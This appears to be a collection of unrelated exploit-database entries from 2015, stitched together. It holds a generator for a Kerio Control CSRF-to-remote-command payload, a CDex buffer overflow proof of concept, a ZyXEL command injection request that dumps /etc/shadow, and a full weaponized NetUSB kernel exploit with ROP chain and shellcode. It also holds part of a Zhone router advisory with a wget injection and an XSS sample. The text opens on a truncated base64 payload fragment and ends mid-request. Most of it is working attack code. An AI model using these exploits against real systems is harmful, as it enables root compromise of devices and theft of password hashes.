IHJlID0gbmV3IFJlZ0V4cChuYW1lICsgIj0oW147XSspIik7CgkJdmFyIHZhbHVlID0gcmUuZXhl Yyhjb29raWUpOwoJCXZhciB0b2tlbj0odmFsdWUgIT0gbnVsbCkgPyB1bmVzY2FwZSh2YWx1ZVsx XSkgOiBudWxsOwoJCWV4ZWN1dGVTY3JpcHQoZmlsZSwgaWQsIHRva2VuKTsKCX0KCWRvY3VtZW50 LmJvZHkuYXBwZW5kQ2hpbGQoaWZyYW1lKTsKfQpmdW5jdGlvbiBleGVjdXRlU2NyaXB0KGZpbGUs IGlkLCB0b2tlbikgewoJX2ZpbGUgPSBmaWxlOwoJX2lkID0gaWQ7CglfdG9rZW4gPSB0b2tlbjsK CXZhciB4bWxodHRwPW5ldyBYTUxIdHRwUmVxdWVzdCgpO3htbGh0dHAub3BlbigiUE9TVCIsIHVy bCArICIvYXBpL2pzb25ycGMvIiwgdHJ1ZSk7Cgl4bWxodHRwLnNldFJlcXVlc3RIZWFkZXIoIlgt VG9rZW4iLCB0b2tlbik7Cgl4bWxodHRwLmFkZEV2ZW50TGlzdGVuZXIoImxvYWQiLCBleGVjdXRl U2NyaXB0Mik7Cgl4bWxodHRwLnNldFJlcXVlc3RIZWFkZXIoIlgtUmVxdWVzdGVkLVdpdGgiLCAi WE1MSHR0cFJlcXVlc3QiKTsKCXhtbGh0dHAuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBl IiwgImFwcGxpY2F0aW9uL2pzb247Y2hhcnNldD1VVEYtOCIpOwoJeG1saHR0cC5zZW5kKEpTT04u c3RyaW5naWZ5KHsianNvbnJwYyI6IjIuMCIsImlkIjoxLCJtZXRob2QiOiJVcGRhdGVDaGVja2Vy LnVwbG9hZEltYWdlIiwicGFyYW1zIjp7ImZpbGVJZCI6IGZpbGV9fSkpOwp9CmZ1bmN0aW9uIGV4 ZWN1dGVTY3JpcHQyKGZpbGUsIHRva2VuKSB7Cgl2YXIgeG1saHR0cD1uZXcgWE1MSHR0cFJlcXVl c3QoKTt4bWxodHRwLm9wZW4oIlBPU1QiLCB1cmwgKyIvYXBpL2pzb25ycGMvIiwgdHJ1ZSk7Cgl4 bWxodHRwLnNldFJlcXVlc3RIZWFkZXIoIlgtVG9rZW4iLCBfdG9rZW4pOwoJeG1saHR0cC5zZXRS ZXF1ZXN0SGVhZGVyKCJYLVJlcXVlc3RlZC1XaXRoIiwgIlhNTEh0dHBSZXF1ZXN0Iik7Cgl4bWxo dHRwLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi9qc29uO2No YXJzZXQ9VVRGLTgiKTsKCXhtbGh0dHAuc2VuZChKU09OLnN0cmluZ2lmeSh7Impzb25ycGMiOiIy LjAiLCJpZCI6MSwibWV0aG9kIjoiVXBkYXRlQ2hlY2tlci5wZXJmb3JtQ3VzdG9tVXBncmFkZSIs InBhcmFtcyI6eyJpZCI6IF9pZCB9fSkpOwp9CnZhciB4aHIgPSBuZXcgWE1MSHR0cFJlcXVlc3Qo KTsKeGhyLm9wZW4oIlBPU1QiLCB1cmwgKyAiL2FwaS9qc29ucnBjL3VwbG9hZC8iLCB0cnVlKTsK eGhyLmFkZEV2ZW50TGlzdGVuZXIoImxvYWQiLCByZXFMaXN0ZW5lcik7Cnhoci5zZXRSZXF1ZXN0 SGVhZGVyKCJBY2NlcHQiLCAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNh dGlvbi94bWw7cT0wLjksKi8qO3E9MC44Iik7Cnhoci5zZXRSZXF1ZXN0SGVhZGVyKCJBY2NlcHQt TGFuZ3VhZ2UiLCAiZW4tVVMsZW47cT0wLjUiKTsKeGhyLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRl bnQtVHlwZSIsICJtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0xMDM4NDk1MTYyNDI5ODM1ODA4MjA3NjEyOTUxIik7Cnhoci53aXRoQ3JlZGVu dGlhbHMgPSB0cnVlOwp2YXIgYm9keSA9ICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTEw Mzg0OTUxNjI0Mjk4MzU4MDgyMDc2MTI5NTFcclxuIiArIAoiQ29udGVudC1EaXNwb3NpdGlvbjog Zm9ybS1kYXRhOyBuYW1lPVwidXBsb2FkSW1hZ2VcIjsgZmlsZW5hbWU9XCJ1cGdyYWRlLmltZ1wi IFxyXG4iICsgCiJDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbVxyXG4iICsg CiJcclxuIiArIAoiXHgxZlx4OGJceDA4XHgwMFx4YWJceDZmXHgwMlx4NTZceDAwXHgwM1x4ZWRc eGNlXHhiMVx4MGVceDgyXHg0MFx4MTBceDg0XHhlMVx4YWJceDc5XHg4YVx4MzVceDI2XHg3Nlx4 YzJceDFlXHhkZVx4MWRceGNmXHgwM1x4NGFceGM0XHgwNlx4Y2NceDFkXHhiY1x4M2ZceDY4XHgy MVx4ODlceDg1XHg1Nlx4YzRceDk4XHhmY1x4ZGZceDE2XHg1M1x4Y2NceDE2XHgzM1x4ZGRceGFm XHhiMVx4YmVceGI0XHg3OVx4ZWFceGNjXHg2Nlx4NzRceDExXHg5Y1x4N2JceGU2XHhlMlx4M2Rc eDU1XHhiZFx4MzNceGI2XHgwY1x4YWFceDJlXHg1NFx4YzFceDlmXHg4Y1x4NWFceGViXHg1ZFx4 NjVceDQ0XHhiN1x4OWJceGI0XHg5YVx4ZDJceDU4XHg0N1x4MTFceDEzXHg4N1x4NjFceGZjXHhm NFx4ZjdceGFkXHhmZlx4NTNceGZiXHg1ZFx4ZDFceGRjXHhmYVx4YTJceGE5XHg1M1x4OTdceGY1 XHg2N1x4YjFceDlhXHgzZlx4YWVceDE0XHhiZlx4OTBceDYzXHgyYlx4YWZceDU2XHgwZVx4ZDlc eGFmXHhiN1x4MDJceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4 MDBceDAwXHg1Nlx4MzNceGNmXHhiMlx4M2JceDZjXHgwMFx4MjhceDAwXHgwMFxyXG4iICsgCiIt LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTEwMzg0OTUxNjI0Mjk4MzU4MDgyMDc2MTI5NTEt LVxyXG4iOwp2YXIgYUJvZHkgPSBuZXcgVWludDhBcnJheShib2R5Lmxlbmd0aCk7CmZvciAodmFy IGkgPSAwOyBpIDwgYUJvZHkubGVuZ3RoOyBpKyspCmFCb2R5W2ldID0gYm9keS5jaGFyQ29kZUF0 KGkpOyAKeGhyLnNlbmQobmV3IEJsb2IoW2FCb2R5XSkpOwo8L3NjcmlwdD4K Python 3 payload generator ========================== For easier testing, we developed a small python script that can be used to generate the payload: #!/usr/bin/python # ====================================================================== # # Title: Remote Command Execution through CSRF - Payload Generator # # Author: Raschin Tavakoli - IntelliSec GmbH # # Date: 12.10.2015 # # # # Description: # # This python3 script generates the payload to exploit the RCE via CSRF # # vulnerability in the Kerio Control Virtual Appliance. # # # # First a shell script will be packed as an Kerio upgrade.img file. Then # # a Javascript will be generated which uploads the file via the Kerio # # upgrade function. The payload will then be base64 encoded and can be # # injected into the server parameter of the # # nonauth/certificate.php script (). # # # # Example Usage: # # csrf-gen-payload.py -t https://10.0.0.8:4081/admin -l 10.0.0.7 -p 5555 # # ====================================================================== # import os import shutil import base64 import argparse import subprocess from optparse import OptionParser import codecs import sys tmpdir = "/tmp/kerio_upgrade" def usage(): print ("\nUsage: csrf-gen-payload -f <file> -t <target-url> \n") print("Example: csrf-gen-payload.py -f upgrade.sh -t https://10.0.0.8:4081/admin \n") exit() def main(): parser = OptionParser() parser.add_option("-f", "--file", dest="file", help="the bash file for remote execution", metavar="TARGET") parser.add_option("-t", "--target", dest="target_url", help="specify the target url", metavar="TARGET") (options, args) = parser.parse_args() file = options.file target_url = options.target_url if not target_url or not file: usage() # ====================================================================== # # Create upgrade.img file # # ====================================================================== # orgdir = os.path.dirname(os.path.realpath(__file__)) try: if os.path.exists(tmpdir): shutil.rmtree(tmpdir) except: print("Cannot clean " + tmpdir) os.mkdir(tmpdir) shutil.copy(file, tmpdir + os.path.sep + "upgrade.sh") os.chdir(tmpdir) os.system("tar czf upgrade.tar.gz *") src = os.path.join(tmpdir, "upgrade.tar.gz") dst = os.path.join(tmpdir, "upgrade.img") os.rename(src, dst) f = open('upgrade.img', 'rb',) bin_data = f.read() f.close() hexdata = "".join("\\x{:02x}".format(c) for c in bin_data) # ====================================================================== # # Generate Javascript Payload # # ====================================================================== # script = ('<script>\n' + 'url=\'' + target_url + '\';\n' + '_token="";\n' + '_file="";\n' + '_id = "";\n' + 'function reqListener () {\n' + '\tobj = JSON.parse(this.responseText);\n' + '\tfile = obj.result.fileUpload.name;\n' + '\tid = obj.result.fileUpload.id;\n' + '\tcreateIFrame(file, id);\n' + '}\n' + 'function createIFrame(file, id) {\n' + '\tiframe=document.createElement("iframe");\n' + '\tiframe.src=url + "/constants.js.php";\n' + '\tiframe.style.display = "none";\n' + '\tiframe.sandbox="allow-scripts allow-same-origin";\n' + '\tiframe.onload=function() {\n' + '\t\tcookie = iframe.contentWindow.document.cookie;\n' + '\t\tvar re = new RegExp(name + "=([^;]+)");\n' + '\t\tvar value = re.exec(cookie);\n' + '\t\tvar token=(value != null) ? unescape(value[1]) : null;\n' + '\t\texecuteScript(file, id, token);\n' + '\t}\n' + '\tdocument.body.appendChild(iframe);\n' + '}\n' + 'function executeScript(file, id, token) {\n' + '\t_file = file;\n' + '\t_id = id;\n' + '\t_token = token;\n' + '\tvar xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url + "/api/jsonrpc/", true);\n' + '\txmlhttp.setRequestHeader("X-Token", token);\n' + '\txmlhttp.addEventListener("load", executeScript2);\n' + '\txmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");\n' + '\txmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");\n' + '\txmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.uploadImage","params":{"fileId": file}}));\n' + '}\n' + 'function executeScript2(file, token) {\n' + '\tvar xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url +"/api/jsonrpc/", true);\n' + '\txmlhttp.setRequestHeader("X-Token", _token);\n' + '\txmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");\n' + '\txmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");\n' + '\txmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.performCustomUpgrade","params":{"id": _id }}));\n' + '}\n' + 'var xhr = new XMLHttpRequest();\n' + 'xhr.open("POST", url + "/api/jsonrpc/upload/", true);\n' + 'xhr.addEventListener("load", reqListener);\n' + 'xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");\n' + 'xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");\n' + 'xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1038495162429835808207612951");\n' + 'xhr.withCredentials = true;\n' + 'var body = "-----------------------------1038495162429835808207612951\\r\\n" + \n' + '"Content-Disposition: form-data; name=\\"uploadImage\\"; filename=\\"upgrade.img\\" \\r\\n" + \n' + '"Content-Type: application/octet-stream\\r\\n" + \n' + '"\\r\\n" + \n' + '"' + hexdata + '\\r\\n" + \n' + '"-----------------------------1038495162429835808207612951--\\r\\n";\n' + 'var aBody = new Uint8Array(body.length);\n' + 'for (var i = 0; i < aBody.length; i++)\n' + 'aBody[i] = body.charCodeAt(i); \n' + 'xhr.send(new Blob([aBody]));\n' + '</script>') print(script) os.chdir(orgdir) shutil.rmtree(tmpdir) if __name__ == '__main__': main()

''' ******************************************************************************************** # Exploit Title: CDex Genre Stack Buffer Overflow # Date: 10/9/2015 # Exploit Author: Un_N0n # Software Link: http://cdex.mu/download # Version: 1.79 # Tested on: Windows 7 x86(32 BIT) ******************************************************************************************** [Steps to Produce the Crash]: 1- Generate a File by python code mentioned below. 2- Goto C:\Users\YourUsername\AppData\Local\CDex\LocalCDDB 3- Replace the Old CDexGenres.txt with New CDexGenres.txt which is Produced by Python Code. 4- Open Up CDex.exe. ~Software will crash. On Further Analysis, We come to know that it is Stack-based-BOF. [REG-DUMP]: EAX 00000000 ECX 779DD018 ASCII "\r\nSTATUS_STACK_BUFFER_OVERRUN encountered\r\n" //May be handled but yet application crashes. EDX 0012F1A1 ASCII 0A,"STATUS_STA" EBX 00749338 CDex.00749338 ESP 0012F3E8 EBP 0012F464 ESI 00000000 EDI 002C7AC8 EIP 779DCE96 kernel32.779DCE96 0012F3F4 002C7AC8 0012F3F8 002E25F8 ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx> 0012F3FC 002E5FD8 0012F400 002E44A0 0012F404 000003F8 0012F408 0000007F 0012F40C 0012F504 0012F410 00260000 0012F414 77C97B89 RETURN to ntdll.77C97B89 from ntdll.RtlFillMemoryUlong 0012F418 002E2580 ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx> 0012F41C 00001190 ''' [Code to produce CDexGenres.txt] buffer = "A"*66666 file = "CDexGenres.txt" f = open(file,'w') f.write(buffer) f.close() ''' ********************************************************************************************** '''

# Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability] # Discovered by: Karn Ganeshen # CERT VU# 870744 # Vendor Homepage: [www.zyxel.com] # Version Reported: [Firmware version V100AANC0b5] # CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018] *Vulnerability Details* CWE-20 <http://cwe.mitre.org/data/definitions/20.html>: Improper Input Validation - CVE-2015-6018 The diagnostic ping function's PingIPAddr parameter in the ZyXEL PMG5318-B20A, firmware version V100AANC0b5, does not properly validate user input. An attacker can execute arbitrary commands as root. *OS Command Injection PoC* The underlying services are run as 'root'. It therefore, allows dumping system password hashes. *HTTP Request* POST /diagnostic/diagnostic_general.cgi HTTP/1.1 Host: <IP> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://<IP>/diagnostic/diagnostic_general.cgi Cookie: session=a457f8ad83ba22dc256cd0b002c66666 Connection: keep-alive Content-Type: multipart/form-data; boundary=-------------------------- -12062103314079176991367286444 Content-Length: 451 ——————————————12062103314079176991367286444 Content-Disposition: form-data; name="InfoDisplay” ——————————————12062103314079176991367286444 Content-Disposition: form-data; name="*PingIPAddr*" *8.8.8.8; cat /etc/shadow * ——————————————12062103314079176991367286444 Content-Disposition: form-data; name="Submit" Ping …. *HTTP Response * ..... <snipped> <br class="clearfloat" /> <!-- configuration beginning --> <div class="headline"><span class="cTitle">General</span></div> <table width="90%" border="0" align="center" cellpadding="0" cellspacing="0" class="cfgpadding"> <tr> <td nowrap="nowrap"><textarea name="InfoDisplay" rows="15" cols="100" readonly="readonly”> *root:<hash>:15986:0:99999:7::: lp:*:13013:0:99999:7:::nobody:*:13013:0:99999:7:::admin:<hash>:16035:0:99999:7::: user:<hash>:16035:0:99999:7:::* &lt;/textarea&gt;</td> </tr> </table> <table width="90%" border="0" align="center" cellpadding="0" cellspacing="0" class="cfgpadding"> <tr> -----------------------------12062103314079176991367286444--

#!/usr/bin/env python # Source: http://haxx.in/blasty-vs-netusb.py # # CVE-2015-3036 - NetUSB Remote Code Execution exploit (Linux/MIPS) # =========================================================================== # This is a weaponized exploit for the NetUSB kernel vulnerability # discovered by SEC Consult Vulnerability Lab. [1] # # I don't like lazy vendors, I've seen some DoS PoC's floating around # for this bug.. and it's been almost five(!) months. So lets kick it up # a notch with an actual proof of concept that yields code exec. # # So anyway.. a remotely exploitable kernel vulnerability, exciting eh. ;-) # # Smash stack, ROP, decode, stage, spawn userland process. woo! # # Currently this is weaponized for one target device (the one I own, I was # planning on porting OpenWRT but got sidetracked by the NetUSB stuff in # the default firmware image, oooops. ;-D). # # This python script is horrible, but its not about the glue, its about # the tech contained therein. Some things *may* be (intentionally?) botched.. # lets see if "the community" cares enough to develop this any further, # I need to move on with life. ;-D # # Shoutouts to all my boys & girls around the world, you know who you are! # # Peace, # -- blasty <peter@haxx.in> // 20151013 # # References: # [1] : https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt # /20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt # import os, sys, struct, socket, time from Crypto.Cipher import AES def u32(v): return struct.pack("<L", v) def banner(): print "" print "## NetUSB (CVE-2015-3036) remote code execution exploit" print "## by blasty <peter@haxx.in>" print "" def usage(prog): print "usage : %s <host> <port> <cmd>" % (prog) print "example : %s 127.0.0.1 20005 'wget connectback..." % (prog) print "" banner() if len(sys.argv) != 4: usage(sys.argv[0]) exit(0) cmd = sys.argv[3] # Here's one, give us more! (hint: /proc/kallsyms and objdump, bro) targets = [ { "name" : "WNDR3700v5 - Linux 2.6.36 (mips32-le)", "kernel_base" : 0x80001000, # adjust to offset used in 'load_addr_and_jump' gadget # should be some big immediate to avoid NUL bytes "load_addr_offset" : 4156, "gadgets" : { # 8c42103c lw v0,4156(v0) # 0040f809 jalr v0 # 00000000 nop 'load_addr_and_jump' : 0x1f548, # 8fa20010 lw v0,16(sp) # 8fbf001c lw ra,28(sp) # 03e00008 jr ra # 27bd0020 addiu sp,sp,32 'load_v0_and_ra' : 0x34bbc, # 27b10010 addiu s1,sp,16 # 00602021 move a0,v1 # 0040f809 jalr v0 # 02202821 move a1,s1 'move_sp_plus16_to_s1' : 0x63570, # 0220f809 jalr s1 # 00000000 nop 'jalr_s1' : 0x63570, 'a_r4k_blast_dcache' : 0x6d4678, 'kmalloc' : 0xb110c, 'ks_recv' : 0xc145e270, 'call_usermodehelper_setup' : 0x5b91c, 'call_usermodehelper_exec' : 0x5bb20 } } ] # im lazy, hardcoded to use the only avail. target for now # hey, at least I made it somewhat easy to easily add new targets target = targets[0] # hullo there. hello = "\x56\x03" # sekrit keyz that are hardcoded in netusb.ko, sorry KCodes # people, this is not how you implement auth. lol. aesk0 = "0B7928FF6A76223C21A3B794084E1CAD".decode('hex') aesk1 = "A2353556541CFE44EC468248064DE66C".decode('hex') key = aesk1 IV = "\x00"*16 mode = AES.MODE_CBC aes = AES.new(key, mode, IV=IV) aesk0_d = aes.decrypt(aesk0) aes2 = AES.new(aesk0_d, mode, IV="\x00"*16) s = socket.create_connection((sys.argv[1], int(sys.argv[2], 0))) print "[>] sending HELLO pkt" s.send(hello) time.sleep(0.2) verify_data = "\xaa"*16 print "[>] sending verify data" s.send(verify_data) time.sleep(0.2) print "[>] reading response" data = s.recv(0x200) print "[!] got %d bytes .." % len(data) print "[>] data: " + data.encode('hex') pkt = aes2.decrypt(data) print "[>] decr: " + pkt.encode("hex") if pkt[0:16] != "\xaa"*16: print "[!] error: decrypted rnd data mismatch :(" exit(-1) rnd = data[16:] aes2 = AES.new(aesk0_d, mode, IV="\x00"*16) pkt_c = aes2.encrypt(rnd) print "[>] sending back crypted random data" s.send(pkt_c) # Once upon a time.. d = "A" # hardcoded decoder_key, this one is 'safe' for the current stager decoder_key = 0x1337babf # NUL-free mips code which decodes the next stage, # flushes the d-cache, and branches there. # loosely inspired by some shit Julien Tinnes once wrote. decoder_stub = [ 0x0320e821, # move sp,t9 0x27a90168, # addiu t1,sp,360 0x2529fef0, # addiu t1,t1,-272 0x240afffb, # li t2,-5 0x01405027, # nor t2,t2,zero 0x214bfffc, # addi t3,t2,-4 0x240cff87, # li t4,-121 0x01806027, # nor t4,t4,zero 0x3c0d0000, # [8] lui t5, xorkey@hi 0x35ad0000, # [9] ori t5,t5, xorkey@lo 0x8d28fffc, # lw t0,-4(t1) 0x010d7026, # xor t6,t0,t5 0xad2efffc, # sw t6,-4(t1) 0x258cfffc, # addiu t4,t4,-4 0x140cfffb, # bne zero,t4,0x28 0x012a4820, # add t1,t1,t2 0x3c190000, # [16] lui t9, (a_r4k_blast_dcache-0x110)@hi 0x37390000, # [17] ori t9,t9,(a_r4k_blast_dcache-0x110)@lo 0x8f390110, # lw t9,272(t9) 0x0320f809, # jalr t9 0x3c181234, # lui t8,0x1234 ] # patch xorkey into decoder stub decoder_stub[8] = decoder_stub[8] | (decoder_key >> 16) decoder_stub[9] = decoder_stub[9] | (decoder_key & 0xffff) r4k_blast_dcache = target['kernel_base'] r4k_blast_dcache = r4k_blast_dcache + target['gadgets']['a_r4k_blast_dcache'] # patch the r4k_blast_dcache address in decoder stub decoder_stub[16] = decoder_stub[16] | (r4k_blast_dcache >> 16) decoder_stub[17] = decoder_stub[17] | (r4k_blast_dcache & 0xffff) # pad it out d += "A"*(233-len(d)) # kernel payload stager kernel_stager = [ 0x27bdffe0, # addiu sp,sp,-32 0x24041000, # li a0,4096 0x24050000, # li a1,0 0x3c190000, # [3] lui t9,kmalloc@hi 0x37390000, # [4] ori t9,t9,kmalloc@lo 0x0320f809, # jalr t9 0x00000000, # nop 0x0040b821, # move s7,v0 0x02602021, # move a0,s3 0x02e02821, # move a1,s7 0x24061000, # li a2,4096 0x00003821, # move a3,zero 0x3c190000, # [12] lui t9,ks_recv@hi 0x37390000, # [13] ori t9,t9,ks_recv@lo 0x0320f809, # jalr t9 0x00000000, # nop 0x3c190000, # [16] lui t9,a_r4k_blast_dcache@hi 0x37390000, # [17] ori t9,t9,a_r4k_blast_dcache@lo 0x8f390000, # lw t9,0(t9) 0x0320f809, # jalr t9 0x00000000, # nop 0x02e0f809, # jalr s7 0x00000000 # nop ] kmalloc = target['kernel_base'] + target['gadgets']['kmalloc'] ks_recv = target['gadgets']['ks_recv'] # patch kernel stager kernel_stager[3] = kernel_stager[3] | (kmalloc >> 16) kernel_stager[4] = kernel_stager[4] | (kmalloc & 0xffff) kernel_stager[12] = kernel_stager[12] | (ks_recv >> 16) kernel_stager[13] = kernel_stager[13] | (ks_recv & 0xffff) kernel_stager[16] = kernel_stager[16] | (r4k_blast_dcache >> 16) kernel_stager[17] = kernel_stager[17] | (r4k_blast_dcache & 0xffff) # a ROP chain for MIPS, always ew. rop = [ # this gadget will # v0 = *(sp+16) # ra = *(sp+28) # sp += 32 target['kernel_base'] + target['gadgets']['load_v0_and_ra'], # stack for the g_load_v0_and_ra gadget 0xaaaaaaa1, # sp+0 0xaaaaaaa2, # sp+4 0xaaaaaaa3, # sp+8 0xaaaaaaa4, # sp+12 r4k_blast_dcache - target['load_addr_offset'], # sp+16 / v0 0xaaaaaaa6, # sp+20 0xaaaaaaa7, # sp+24 # this gadget will # v0 = *(v0 + 4156) # v0(); # ra = *(sp + 20) # sp += 24 # ra(); target['kernel_base'] + target['gadgets']['load_addr_and_jump'], # sp+28 0xbbbbbbb2, 0xccccccc3, 0xddddddd4, 0xeeeeeee5, 0xeeeeeee6, # this is the RA fetched by g_load_addr_and_jump target['kernel_base'] + target['gadgets']['load_v0_and_ra'], # stack for the g_load_v0_and_ra gadget 0xaaaaaaa1, # sp+0 0xaaaaaaa2, # sp+4 0xaaaaaaa3, # sp+8 0xaaaaaaa4, # sp+12 target['kernel_base'] + target['gadgets']['jalr_s1'], # sp+16 / v0 0xaaaaaaa6, # sp+20 0xaaaaaaa7, # sp+24 target['kernel_base'] + target['gadgets']['move_sp_plus16_to_s1'], # ra # second piece of native code getting executed, pivot back in the stack 0x27b9febc, # t9 = sp - offset 0x0320f809, # jalr t9 0x3c181234, # nop 0x3c181234, # nop # first native code getting executed, branch back to previous 4 opcodes 0x03a0c821, # move t9, sp 0x0320f809, # jalr t9 0x3c181234, ] # append rop chain to buffer for w in rop: d += u32(w) # append decoder_stub to buffer for w in decoder_stub: d += u32(w) # encode stager and append to buffer for w in kernel_stager: d += u32(w ^ decoder_key) print "[>] sending computername_length.." time.sleep(0.1) s.send(struct.pack("<L", len(d))) print "[>] sending payload.." time.sleep(0.1) s.send(d) time.sleep(0.1) print "[>] sending stage2.." # a useful thing to do when you bust straight into the kernel # is to go back to userland, huhuhu. # thanks to jix for the usermodehelper suggestion! :) kernel_shellcode = [ 0x3c16dead, # lui s6,0xdead 0x3c19dead, # lui t9,0xdead 0x3739c0de, # ori t9,t9,0xc0de 0x2404007c, # li a0, argv 0x00972021, # addu a0,a0,s7 0x2405008c, # li a1, argv0 0x00b72821, # addu a1,a1,s7 0xac850000, # sw a1,0(a0) 0x24050094, # li a1, argv1 0x00b72821, # addu a1,a1,s7 0xac850004, # sw a1,4(a0) 0x24060097, # li a2, argv2 0x00d73021, # addu a2,a2,s7 0xac860008, # sw a2,8(a0) 0x00802821, # move a1,a0 0x2404008c, # li a0, argv0 0x00972021, # addu a0,a0,s7 0x24060078, # li a2, envp 0x00d73021, # addu a2,a2,s7 0x24070020, # li a3,32 0x3c190000, # [20] lui t9,call_usermodehelper_setup@hi 0x37390000, # [21] ori t9,t9,call_usermodehelper_setup@lo # call_usermodehelper_setup(argv[0], argv, envp, GPF_ATOMIC) 0x0320f809, # jalr t9 0x00000000, # nop 0x00402021, # move a0,v0 0x24050002, # li a1,2 0x3c190000, # [26] lui t9,call_usermodehelper_exec@hi 0x37390000, # [27] ori t9,t9,call_usermodehelper_exec@lo # call_usermodehelper_exec(retval, UHM_WAIT_PROC) 0x0320f809, # jalr t9 0x00000000, # nop # envp ptr 0x00000000, # argv ptrs 0x00000000, 0x00000000, 0x00000000, 0x00000000 ] usermodehelper_setup = target['gadgets']['call_usermodehelper_setup'] usermodehelper_exec = target['gadgets']['call_usermodehelper_exec'] # patch call_usermodehelper_setup into kernel shellcode kernel_shellcode[20] = kernel_shellcode[20] | (usermodehelper_setup>>16) kernel_shellcode[21] = kernel_shellcode[21] | (usermodehelper_setup&0xffff) # patch call_usermodehelper_setup into kernel shellcode kernel_shellcode[26] = kernel_shellcode[26] | (usermodehelper_exec>>16) kernel_shellcode[27] = kernel_shellcode[27] | (usermodehelper_exec&0xffff) payload = "" for w in kernel_shellcode: payload += u32(w) payload += "/bin/sh\x00" payload += "-c\x00" payload += cmd # and now for the moneyshot s.send(payload) print "[~] KABOOM! Have a nice day."

Vantage Point Security Advisory 2015-002 ======================================== Title: Multiple Vulnerabilities found in ZHONE Vendor: Zhone Vendor URL: http://www.zhone.com Device Model: ZHONE ZNID GPON 2426A (24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models) Versions affected: < S3.0.501 Severity: Low to medium Vendor notified: Yes Reported: Public release: Author: Lyon Yang <lyon[at]vantagepoint[dot]sg> <lyon.yang.s[at]gmail[dot]com> Summary: -------- 1. Insecure Direct Object Reference (CVE-2014-8356) --------------------------------------------------- The administrative web application does not enforce authorization on the server side. User access is restricted via Javascript only, by display available functions for each particular user based on their privileges. Low privileged users of the Zhone Router can therefore gain unrestricted access to administrative functionality, e.g. by modifying the javascript responses returned by the Zhone web server. Affected URL: http://<Router URL>/menuBcm.js To demonstrate the issue: 1. Set your browser proxy to Burp Suite 2. Add the following option to "Match and Replace". Match for the string 'admin' and replace with your low privilege user: 3. Login to the Zhone Administrative via your browser with Burp Proxy and you will have full administrative access via the Zhone Web Administrative Portal. 2. Admin Password Disclosure (CVE-2014-8357) -------------------------------------------- Any low-privileged user of the ZHONE Router Web Administrative Portal can obtain all users passwords stored in the ZHONE web server. The ZHONE router uses Base64 encoding to store all users passwords for logging in to the Web Administrative portal. As these passwords are stored in the backup file, a malicious user can obtain all account passwords. Affected URL: http://<Router URL>/ 1. Browse to http://192.168.1.1/backupsettings.html: 2. "View Source" and take note of the sessionKey: 3. Browse to http://<Router URL>/backupsettings.conf?action=getConfig&sessionKey=<Enter Session Key Here>. and all user account passwords will be returned. 3. Remote Code Injection (CVE-2014-9118) ---------------------------------------- Remote Command Injection in ZHONE Router Web Administrative Console Any user of the ZHONE Router can gain command injection on the router and can execute arbitrary commands on the host operating system via the vulnerable ZHONE router web administrative console. Affected URL: /zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3 Affected Parameter: ipAddr 4. Stored Cross-Site Scripting --------------------------------------------------------------------------------------- The zhnsystemconfig.cgi script is vulnerable to a stored cross-site scripting attack. Sample HTTP Request: GET /zhnsystemconfig.cgi?snmpSysName=ZNID24xxA- Route&snmpSysContact=Zhone%20Global%20Support&snmpSysLocation=www.zhone.com %3Cscript%3Ealert(1)%3C/script%3E&sessionKey=1853320716 HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/zhnsystemconfig.html Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0 Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>) Connection: keep-alive Affected Parameters: 1. snmpSysName 2. snmpSysLocation 3. snmpSysContact 5. Privilege Escalation via Direct Object Reference to Upload Settings Functionality --------------------------------------------------------------------------------------- A low-privileged user can patch the router settings via the /uploadsettings.cgi page. With this functionality, the malicious attacker is able to patch the admin and support password, hence gaining full administrative access to the Zhone router. Sample POST Request: POST /uploadsettings.cgi HTTP/1.1 Host: 192.168.1.1 